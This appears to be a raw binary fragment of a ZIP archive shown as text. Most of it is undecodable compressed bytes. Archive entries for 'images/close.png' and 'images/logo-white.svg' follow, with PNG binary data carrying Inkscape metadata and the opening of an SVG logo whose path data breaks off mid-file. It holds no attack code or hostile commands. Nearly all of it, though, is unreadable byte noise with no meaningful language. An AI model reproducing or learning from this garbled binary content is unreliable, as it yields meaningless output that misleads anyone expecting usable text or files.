(@ ��@ *�1�q5�@ǽF�@ ������/���NJ��@�J(P0�a@�PFPF�'N(��PD⁅AN�v۶�j��dC�8�b���	l�\��lט��s;�K!��f�k��˝�9M����3�G0o��F�SW-���Er]Cx���J��;�c�
`�Z��?Jl���v�J:p�����o.�xv�Yi <��W�'p�F�n�W{}_@*]�ٚ�ٯ��Ѿ+�me�C�U��̾�����
^S.���f�Ap�-#1��)^Z����R�+��<+���
M��V�
+Vq�5Vf����eR�a]�'��[!�G֮�L|+YL+X�#x�7���}����kyqj[#[��H9�p'7gWq*���T��o�m�\�"H�k�-p��ݪ�Wj�kݗ��G�X�zn�4�yB	^��N>[�X��,ѫ��,��mcN�H]価��;���Cj���\�B��M��\ן�4����[�eI�0�m�|�@B�%��"�mR�ԝ�l�iq��4Ի
����k��r*�H�\�I�z�$�.v��$�v(ˈ��H��3���3iҾ8�Ll��SJ�o�O�}��o�/UħK2r�3���5���ֶy:���}��QFN��tj����\>���8��(�_�W֠��[�86������#ſ�T-��Ԛ<SakhJt�EP��'�j"��a$�s��#5��*>dE��m�LVצ뷙�<|�q�,�s�çۿP7{j6g��1�/�w����ֺNݧ��-?Q6�(. td��!�r�Z�:N��nYz�e������y�~+��{GI٭�j*�Px�W6��P�@�'��\�������%�'~��n:����aAΕP�J*�
%
%n(#qA�����րfJ�o>�ٶ�L7W(��Ӓ�U�m�'��__�Wud.m�G&����+ѯD�W�k�9y�$���etҟ�K����0��P
s<ְ�>Ҫ�3AU�Ns��AF�/�>�E���=��[\C
6��
�Wy��3�����V�A�
�,���g��[���e,�w�j�qg��y����j�k!k�CZ����,nk]N��8�^�/1��TY�͸�mH.�ri�*l4;S,�
8�2af}O8�YvO
sP@-&�P���r������@�p��`�0ӵ�Y��}�Z��kK�F9��Tq4S)u�xn"{^�*�@���Y��|fF�ᠴP�t�T���f��z[�{j�OU�&�[���eN�ؘ�3bC+��xo��Z��e-����^^�h\N���M�W	vA��H	QF����ZfOr�re��s|�j���CGrVGmf��
�����O�n���BN�q_G�LL�?���zy�wx�)�5������_N}_G�_�y;'��O�À]kg�nG
�Xi��xqB��`�q<R����>+Hk"i��I�UY��-kAm{PL�'
8(%�c�KF�}��ҭ�"
���}�ՠ[]K7V�����K�5��xm�z�z��w�r�5�\oF���fퟮ6�\s���M���n�<7;�ˡ�����I�F-5\lì��U�@��A�g��>'b~�'E��1�1�p�\p�(8�op�]�
�8Q@�J���a(J�2PF�'H浥�!���W1���g��R�����{]��M�{vI���y�v빹����K[Nә^�z�r�����.�Н?�V�W&0h��p�PX��[�S�+XKJjN8Q��I@�8���QQ5�q���.�>Ս�7R�N�d�P�?��
f��TLS׾�n���ؚ>�޳Z���T�.�3�;=vxs-�u(kGT^,���u˘�;,��E�h��������\�t���$H�
��k��03�\�C%����k��je0����CG�W�0eA�n�p��W5ڜ(ϙ�{������p��i�!�4��зl��'zH4�3W�	/��W��Ȅ�eq����N4��W)�:����'�+���
Z"�H�r��QM4p��q�K�*,�r���c�K�MI�c>�ؤw����Qo$\�p:��kV�;]�zz������Mq<׼�B��hkCM`
h���}ūE�?�1����%�&���}����߽��CMX���O�S*͵YT�܎Т�z�
��n��Eb+���[��ZJX�$�#���с@�8�i8W���Q�kL��-x�
`Yl�� ��S
���)����se(���3ţ��𱶒�jm����`�<g���y��;N��zZ�.���@O�mG�,^������m�}��M�n'!��\�76��\Pj;Z�Q�[x��C~Q���j��@ 7�,��ۦ��d���G:J!�I@�T%n(�7���c2\Jؘ3s��%�ˏ�R6{}Q؇]�2pe����[��ώ\����us��C�Ζ�y�N�sW-��y`9�ƃ3ZDn/�pT�'���EIn��OQ�+"U��hZda�1@��PƴQQ���7�P$�Fx�QF�
��\ߵs���}G�:�]����!x���h-0"&h@�Sp�bcƽ}��� n�;�^�d�3{{+�^�=n~[�v�O_���id��.5��wm���H/��bV�lN�i�<
��o sj�w�V,V�}zrpF�0��*kPG`F�9���#A�Qu��~��A��eH-^�.g0yQ24-�<~~
��8f��c�%�'�h��f_�i��дiWP�S'�̒�_,LN?jyLH��ìU�ʪı,���Zq<&��#��76L���j�f�p.��-u%��{��I^#������u�U�y���Kl��\,���e̟���}�/�ק���]��t�-���C������5�e�����K��޽�V��y{�o������7�idv!�9�sP+�I�����Q���9"�ˁ�����"�:���‰'$CĮ8fF!�5CH&�r��*dW#���g�Ae�܏0���#pPL�t��ژ\�"q泅�E�A��S�0ev�z�� �p�7��{���f�xt6>���ȃ���\v���Y�o[z�e��2~W�.W�h��թ��+�x<ZA\��g�4�����|O�pQb�(@ =�{�
����e���._	�b�ͧ"�*���a)C	P1Ƃ��%���l���I/��]N�.��Z�ݒ8��2�@Yan-�r�S���k��˝�8��u��%2]L��q�8��뤞�ϕI^�hE#��R(x�i����d�x\{��,y`�����N��<9&&����-h��X��)�!H�I5�
�P�hk��P?˲p��M�V�dy��B�ע7#�eV�U� �VW�vHw}���J �O?+�-w�s���aӫ��c��짳���vh��Ůi�γW��i��]����J,Utvе���
B˝%�J�
�HÑ���8U�<AV��G���7�@���S��L���Ӂ�჎�L"2=��~�Fc�b�����Z�CB�jwI~���� P��ᮍh�A���.0
7�:0U�y��1�O�r�b���H�:@(r���]dr���Eb��sGS�赬tþ�9�����̬?M��vn?��x�O���xzD
Ļ-Y@d�/��9�~��K��\��,u�p+�/�����\vŵ�2)T���f\V.�B�|�9�$�w9��;�S]3MZD.����UZB��4
,>!ǂ���#�o"�S��j��"�
N.�d��<F��^af;���*i����(;q9�-G9 @T�����L�r*�#I�A,8��<9�
Y9�����C#�p�.!K���m��x�w&W���7\�p�~כ��u�w��k^���@@ �A��X}M���Y��okx��*������v�#c`�� &�~�향�X���*5d�{�mzm��{gÆ�=g��
,��ʈ��H�i�z5��m���$�֣3�8��e]�$�!���9�#&�4@�bB�(5�^!�"tl˭عjFiµ$��
$Rq�@ׂ���Ft0a�=��)$|lQǀ�R�F�>M#H���s�æ���"��ǟ���^*�GE�E\�",0 ���2��B�_�~�3ڝ�х�CAv���{~���G���[⼾�W��F��r�W�vl��\�F���j�gE\ػ����H$f.��S����=]�2������,E�#
p�qݵ����Q8V�`�,��<T9���G
�P��'KH�s����"hĎl%�h]�!�����Yŭ�ެ�݉q�uv�JՐ��'�ᰃN�)A¼L�k0���~�p7�������iA���]]y�x������1BZ/�G�^��F�D�9���3���74����z���w��&�/my�$hq4�Tv��*=M�A����x*�!ak�3ӊ��+��h�R�����(��uP׀@�D�㎠xsTG<f)4֜Z9�����S��q��T��)c���m�ƅզ �&d��փ>��q��vHA����@�(k��puTR�L>�y��k���hv���	u�}ɀ�_,�dQ��<����M�j�{���!���[����.�1��<5�ܗ���{z�Ͱ�@ �A�z��쵾��Cg)��̴w����Kd���5��k��<�2�5wף��{q�7=�R����ɤ�0^�t�Õ��=������5Qv�����J��TN���@���P��p@�6\��b{�n���KL�Ԑ�H��@�cߒ��b:XeJCgx���䔑X�q��E��Sy�go<���q��d��^��K�E\�a����#�&����Q�#a➾��6�Y�F�vj�b#��Q@�������>�i�|���0��E�������[5�Չ"��5֭�Q�<}�,��@1qqy�6傍�-t�u;1�"�{]�����"d26`��O����K��ֈ��<A��up���߱�i3v
`{NH�4a. �W
 `Ɵ��F+|��o� �h�ڗ�N�\�˳�z�zlly,=SM��'�.�zg��l�e�F�oio0G-
kG�����#�ﵷ-F
N.9��Zaa�@�
r9�c�;`��#�w��a�g��yŧ���^��.t�\��AVX������>�a�-��
x��`i�Qe1�(�>�T4s�˜S���^8�p�H�1�g���$<*1��(�IU�����!�
�uG�{��@-5<�a͹��Ʋ���ySC��$"��% �DL�R5��h��{+\�J���($hw 
2)�*+ѿM}8n';��k$�ͧ�'?�����=��X�ӧ��׉��@ �Ql6[��s�޶�Nޗ�WF�$okJֻzܥ���}A�n&�s�n,�=��M</nl{u����{L��b��!��&L/9�*�"I�\q���<�D!5 m3<x(��\��Pǐ�W��bśa��;ڮ�V��]�L�������*6��sYJ��BI���iQ�`u�q9��K�PW5`I���j�x]|���[i�/��^���
*�(�}A��4�� �ˌj>ӐR�#S[T��5�&���G�>�j��n5�i�\���w{�
	;^1�+��Aa�����ɚ[,|G'����m1W]��1�lw{&�5��Z��a�a��^����_+�K���t�N�s���� W��M�O�t�p�i�2�n�GP
'22XîQ��g�(r��8���E��g�(��H��v�(xf]R���0�.�*�jm�?p��V��^Tt.�Ú�s�.#�;�|�Y5����ʭi�G�~��y�~��Ǧ���a�����ti��g��o���0bsy�仼�X� �(\���]f�H�R�]������~���o���
{Wѯ"�$���`��P�I���TT^c�Z�PxsD !��[�w��C�#,��na{�y�67�A�����H��양i����p@��k�$S>�*j{��Q-<2 *�4w��.TELшq}Fd"|$әA8���@�����8!��+�@9��q9��Y��6+�Pn�X�V�:�f����ϳy��zk�p��;K{+Xm-�#��F��E�-��{d�e �@ u�����j���]�oi1���N���l�Ê����q|9�i����ڎ�4�A��)��M��Js0��`!i���a�QN�F�$�x �w n�^@=�;U����`�h
ܩbv0��U����U5	�5��"�_-���dгV3ˋ�\���9`�P#C���ss~�7�־_G�F=;�����Lo>h��!����;TVE��sw�������B͹nEGY�0�f���^8]��,xt�PH(prܮVam�i��\���ipȠ�y��E�i2�۪�w��>޹��u��{e����$i���B��/����֘�GJ��+\�>H�\H<j���;�4���Y�1�ObˤVk�g�A�qWi�h�h��#p�Ε�k���qV7�tm�[���$��e��7��C��3�i4���g��u���S]lh�t������=9�x>���_�%��0��#cs=݁{1�s�M�h��&�Z�Uq�=��2��T�_T�z�� \B@��⯴OZ�������AQ�Nw�Y��A�~����ܖ��}���w��kx���>=��ד+�*�V��EC$���Ƈ�0�OgF�<8`�p�U=��"�A0h�:���ᑧb�e�.\�����2��h��?�Kqv\�@�Z4Ԟ(�G���C�W:�Zr@�ZK@���PC�5��N(&�*gĔC�`w(���]@�QS�$�}�.[�[���3,��FƌK��@楸X��Gzb/O�M��u��}䣋�1�����;�=�������@ ��?Z�N͜�z�i���:��ӑ��������gGo�p���<`�܈5�9q�i8���L:>x �BC��#qʩ
yi�pU	Bk�ࠂ�!$nk�i�R̵+(����uGȮ�]1*����ң�tӲV6Ѣ&=��X�7J�\*()�S$���I.�(@�x�V+QH}G>�>�Z*�/�L�
]/p��T���y})��+'8т���/�^�%�ݼ�m��~�ڣq# �L	�8 ��Ў�;�ljUP�.`B�K�I�P���bŶk)`���H�7�RpyA�m�6�=�ݿ�pi=N��j�}��;s=o�S��
3ͳ�"��X��ʡf-5ְ�ʽ�X��b��-�!�OU��.-\57X-<8���l͸{"`e�F�,�8_qv\(Z��<;���#�e!��F���c���o7�]^5����uuMN~�zz:-�y��ښ�]|�F����kH
�&�ց��}�f��+�\�W�Y3�\N+5�t��+"��߉QR[�#$l���F��B�/.�b�?�k�<��C�r�Y�_�x��En�f����һt_��}��x��a �
�}:�7]EAQU��'֭�\
"����,vY�Up	���6�09�o`9P�QY�7O{]Pq�$��PC^A˘U��S�[�i\*��D���_ ?b�j)���,tԸq�E+C�pk؂)���R��H��9�p.?��.:K�N_jh87���s��mFc�A��>�Q7|�a���[(�?����Or��;�������5�����@ �@ 2ha� ���ZY$o��p���s ���C��_JnF�զM����d��q���|��;A_G���/'f���	kr�v�tL4��e���pR�L5 4��L!���90�)�at�S1�S�����s+�R�e�n�;S�p�LseMc��7�ӑWNߊ��~��Hu��X��#1!�~.)V�s�8g�<aJy�ZvV�RnG�*V��s��/�'Fmvx�ZF��9�3��fWʵ�5�)� Zڅ�����,<�������<'%��Z7���e��6��+,�^2W�[�K��€�<�Y����u����WŮ'�$f��K�o�8}M;=�V��q䱬ku�"2�E_W/e;�ۤ�$՛ֱ.Z:��FD.U�9���t��s�Yv�.m�/���xZ1>�u������m^�t��mΚ[G6�e���{���9��{��x��F��Kt��ƃ!ؽO��f
y�V\�H��Xϙ����f���F���*VX����W	�e��QL���Q\[�IÇh�hS+u�w[���}��bɬ�{{���.�w����η�x�����>LO��֯]v��Ƥb
ʢ��P�Fd�ɤ�Uuq�g�TB^��hi�MQ
��4$�j9�A�s�]��2�qF�S�]�����L���
�w�n�i㑠��#:�/�q�	[Gqp�ޢ"�g�3�^K*�d"��48t�ي�]����PEyq����R��i��D?�H�S�+пM��������V�&{Oo�ӟ3�5�޼O.�=y潝|�� �@ �@ ��m~�϶���.�F��4�sN ���\ij/��u���[ín+-�ľ��l�'��r�}]�x�吝r�ϵtdƷ�;�h�8Ԫ��z�4�	�(Y��
k��=������Wm�s]+�#��ϵs�s�^�c����Q+<�N��U,
��T�ʘBj��Xѐ��Tlm$��-έsO,V��]y��Lɡ.�Iƫ�����׏z#���SsU��b�"$
�%��4����ĺ�tN8a��Xܪ�{�ui����S�3QŪ�c{$��Ç�X�=���p�h��V�`dW����.�_�k����$r����k�+Ë//~fӃ���hB߻�뻶�Pֹ,m���0.���.6�T{N�.�G4���0$��u����z��f�ogdҙ���:����Y��{�m��k6�i�{�� ������ĸ�QU�a�/�s�I��x�Cq�a2|��R��e�ړ�͋+KN�H�c
廳��v}�o�� �Iq�1�?a]4��ﯗ�m2�Kb�zhI�/�_:4���a�E5�p4w
��H̃��تD��	�JS*f����
�%a�@ua�j��V�i"���%Qd	���EJ5bi�t��U��Ոyq��l$��jM+�AZ�j)�sE�Js���?��Q��:��
�諯Q^	.���8y��?)��3�{��I��u�ݿ���6���C#������u�{R(�@ �@ �Rzsl��6ٸǮ1�AMq<xd��p�����s�Yf*z��;��7wm��Tn��n�:'�|��x{��Ӳo3M����4]8�t�V��P'؊B	$b�=C�=�d=~3J�L	���p�::p����s�%r���aǴ�+HW�Ԟ!�+�1��h�y���Q���\|��Mi��cg��ڶ�g��|��9U6�8`��~ȖP�lu4*�A�
(-�deEd\��5����ybqs0�Y��-���E![��Z���x���;}�t�C�j#�����]v��&�ak�m'i����y����u��yr��SZ��#�%*ј#�<W��[��}���1�^�K��ֵ�;}��m+�X�hy���^�������ҽSHྒྷ㣖F���3K]#�ݙE;�
��3k��Z8 w��-p�A^m�?$\�.��	�^Х��3}�Լ�����!c�nr�NSȕ��Zݧ��_jx|��*��(d
�]Z
��k�u�����ˉ�{���Q�/b*�[���M��iY@1�cU���EI8j���U�*P���<1B�-tH�Z�8B��n�Dx�$Z��"$�����c�$S�Sh�0���M��އ�m�FZ�v�wuuL���\��˷�i?�N�=�Am�}��g
��Bhm�>�x��6�ۚ�I�� �@ �@ ީ���}�M�s�ST36�dRp�3��[�{��gme���]��қ��o٪'Uַm˙�"�D|�ྗ_d�f<{�u�z��[e��84R��c�eq:� ���1���������Iyȅdg+�m[�<�H�u�<�#�K��{Hv9�Xl��r'#����,2�;%��jm�6�b2'���cgѶ���9����m����2[|VZ5��j�Z�‚���
�>�P���=�1�*n�ԅ0�^���W��j�
�n!Ef�;k7+?.�nb��y�ŧ��]�~�.�ׯl�8:��m���E��T_;��/��1�.Ӳ6�	�h���fb?������|������,'�,��Z4��/KDŽ2<���P���D��q �oY��;`��K��񽅤	����aJ�W����o�R��1�Q-u(zqR&PH�K+���+\�����m�H��,'lrE.�&%�72*)��Ur��^Z9���kr#�*�[��m�&�$�wR�_p;��9�1#�TO�"���F(�-�C*J�b[׽�F�4\�rAc�	�c.�UFe�?ї������Sv;t2���3\�{f��oN��޶Ͳ�k����!�"�h��s�x��v��s^�$��K*�@ �@ �/�^��}E�I��p�`~,x��xd��?�൦�[����1_1���{����w�a1?I|�� �K����_K��oM��מ�=�`�8ŝ�����Z3 V���F-Y�#�i���+\2�:*�8���Q�r	-�0�Xٸ�#Z
s'��j"'�� RГTh�{�(,Gß��km�&P
qÊ���~��l������{��?��VZBc�~՚Z����5…/��4�H(�*HZ�e�+"�c����\9�8�Ɵ���\�����u��~"г{�0'�*��,�a�G��tV��%Q(j�v�
�Ҁҁt�4�i! ��]�v �V����e�#��?�u����y��A�r+L"-q´���DV�P�y�S*�(jO�D$�GPθ���yo��"�\���,�$h�J�w*J���g�(��g1E���B)�\�+R�V�Iqh^���#͌a��q�Ll�����cA�D���>����Q u���%�(d#8�g�9����4��z�����XXY�����m�dm�v��į����ײL,(��@ �@ �@ 
{�ӷn�m���nm'�'�q0G1
뵗1,��Տҍ�ҳ���:�`�)r_N��=�z�w������˒�G
�x�L�L-��
Tf��Bi�2������և6j*���R�[AJv�����5Ê��A,D��ˇr�Jٰ[I4�({H�_F�&�U����6�^�<O�|V �(-F(N���@����#�����P!Ƨ�ͅ�#{@���{[���@Q@�QQ����}r�3m��ϵ+Z�����5��P�j�}_�x{�j�$S�y-���QL|8S�ZB�h�A���3�
`1*��hp���D0�B�0��.J5��p�kP�9F�.�S��P4��ҧך
Gp9�
��1�!���.��ߥ�ܼ��xk���tPZ��O��3Ú�}�q<�u�g��{{x-��x�1468�kZ2�/\��@ �@ �@ &�)�|31��#K$��9�k�\Ӂ ��/��[�]��Q�C���.g�j�?s>U�z�{�+����E$H(��4�GW�<�(��}��UXA$�
A��N�4��<�j�mmI�5�4�Žq�+�u
89�#'y��A�� V�VŎ�kQS���蝘�cۜ
ko>��7�^޿�K�~+
�1�T�ؠ�‚`�P/��(灙��"@.ϗ$؍*{T�(3A��*�T
� �L�����:���eQ�^7d��;\9^�
�]?�x���V�o��@
��8��8��#K�+�+ނ����x��TD�
I×2qT¸��)�qD��y�jqL���q��Cq#* SL�-u��2�ۣ�{�A4�85������T�^��?�[{gø�L�4V;<��/�r˽x;~�x�����5�K���@ �@ �@ �����n��]w��l7����蔌���ǿ%߫��9o�6|���oy���=�[�RX�$m|Q�`�}
7�LǓml��-ahƸ�WFei>`�Y�E6���b�m�4$֪R!��ùe���� ��9�r�J�ۨ~Z�5���譄j���y۱|��ڽ��Xh�Xm3J���E[��B B���v[R&�c80�܅lH:
��צ��E!�kE1x�
qDA/�ʩ����U��@ �O
���c�ہ����pn�p0����~��N�޵l17:q��&J�:� 9vQUQ|��v�_u"'��q��JD[�Q�b.�#Ncܪ`־?;Ťp(�OβU� ����4��j6�;���7E�U����2U��gW;� 1\�;f�[׮�OI�#h����>��kׁ��#{���{���ק\��.N��@ �@ �@ �@ 
�ǵov/��-�un������Z�е��[��k,�xg�?G�]�Iy�5ۖ�Ө�n"�G�kq��_f^/�ߦ�-�7y���H��p^����Ƹp�b�H�)�*�G#�|+*i8���i����cn�� �!tՍ�Gz`W�Uq>CA>Ҿog�^���.�jXt8"�f��H�m��!@�PW��PA�G���s‘��*���1�8�	��8�!q�%�
 Z 
�"�92A�z��m��J�&��R�(Fk��G��͘�����0�>����Xt�A���TRp"�� �)�X*+..��đǝG48FL&R4x�Hp����ӈ�j�r<p|VN��(*��!��\�N�����۹�n�D�olh��0�k�����:�����c�^�:?/b��������[��(ȣ���ۚ�I�	�P�@ �@ �@ �@ �@ �}e�Y��S�}�jE�
y�����ۯ�m�=��ϟ�Y�u�_K�9��m�4��
�Z�l=����ۮ�}����A7!��[�*���T���2��s�֜�����1�����\��8:�.�ξ������*|J����{:�X���7Cub���؆i� 
(��:�v6���9�G�B��r�h��g:�=��T
�(�
�@�"�%G#��M��IUc�c.u�?a^���c�mۇ9�ƙ���w���4"�4�QRG<8���0�TA�T�S3��<q��.�7p�L�8u>��8�w��v��[{���������\;;�ۮ�Wg�zc��ci��ͻ�{7T�������wm���N���\��@ �@ �@ �@ �@�b�X��l�<���p9� ��Y~��;���c��=�|�5[<�q�.��}�<��T�xW�}�_K��b�E],����� �W��{�]��Í��.v��S�5�O���|�mXj~Ɯ��W=��oH���mI��A�y_;���gW�8�N�����Az1�DN�
r�3��0�DZ�=?��y�ʈ��k�@�P+sARaG�X`uH� �P*@��@ d�*9W
���
��Cx�M��9�<���?��޴|E��aQ�{ץ��;��=@�����;~�@�1{h�j��?z�6�9�Qo����hN7�Ց_�_��{W.��u�首�c�_���[qv��Wë̙�D���0᪾���;m㇧N��
��� �@ �@ �@ �@ �@ 2ha�'�<m�)k�xk���
1�g�?��2}���oS�!��ǶF��p����ys�r�k������,�&�ɕ�{gYX�{@���m�N�k��X��4h� �ʝ��+�OH�Uۇ�;/�+����#E�ru
P\�`\�;PH2P5ʈ�h �4����F|���r�����ssA^aRQU���V���f��(�%P#�%G;�[���EG���n6����9Ƽ�+�[���b���6��4�2�֚"���^����lߧ>��$�?�������ؼU�z���_��^�^��~�zwi
�f���h�!����y7�m�;��#����@ �@ �@ �@ �@ �A���ޞ��۱7v��)<�[����N����sc,�#��n���c4pj2�8�k�p��k��뉅�;�z��9��0��i^2���".0 � r�(##Ek�N�}����HU�B
@�� �Q�QP8Uni@�"�FQ(J.TD�UTDv�C	�C�S*�?�x7�����\��۴jv�\d}i�U�N�Y��W��u�'��?�1�n�dOh���_���>�=�6��nk#aa��@ �@ �@ �@ �@ �@ �@ P�9 �6ӷ�ja
w�gOقdW; o�<}�+���fl�9��\���nDQ���*)���w"}����HUʢ5�4́(���:0B� ��$(�k�zZ]�*���W/�CG7ȝ�c�y=��L��v����
�8��� �@ �@ �@ �@ �@ �@ �@ �i�Jv��Ͳvz=��n��9H�DN�����Q��@�'�T��P?o�tvP0��-h�{H=Ʃ�xU���8q'��XlQ����ڂȁ�70w���@F�獿̮D�Yی�{���*v�ٌ��p��J�ُ�����'�v �@ �@ �@ �A��PK�8FZS2b��images/close.pngnu�[����PNG


IHDR  �s�gAMA���a cHRMz&�����u0�`:�p��Q<bKGD��#2	pHYs
�
�B(�xtIME�
Y
x�IDATHǽ�I� M���<=��B���r�`�X�$��@-7����!��8�r��#��C�b�Z#���`�c�+���j���*����z1��X�����G�Q�e���r���Ħ*�uq�������y����ܥ�8�y�n%tEXtdate:create2017-03-22T14:10:27+01:00LlX4%tEXtdate:modify2017-03-22T14:10:27+01:00=1�tEXtSoftwarewww.inkscape.org��<IEND�B`�PK�8FZ�$images/logo-white.svgnu�[���<?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 22.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
<svg version="1.1" id="Layer_3" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
	 viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#FFFFFF;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop  offset="0" style="stop-color:#FFD797"/>
	<stop  offset="1" style="stop-color:#FF8523"/>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1
	s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0
	c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2
	c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4
	c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2
	c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4
	c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4
	c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1
	c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2
	c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2
	c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6
	c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7
	c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1
	c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5
	C40.4,20.6,40.4,20.5,40.4,20.3z"/>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5
		c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3
		c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1
		c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3
		c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"/>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3
		c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2
		c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3
		c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"/>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19
		C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9
		c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z
		 M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7
		C88.8,5.7,89.1,5.5,89.5,5.5z"/>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1
		c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2
		c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7
		c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1
		c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5
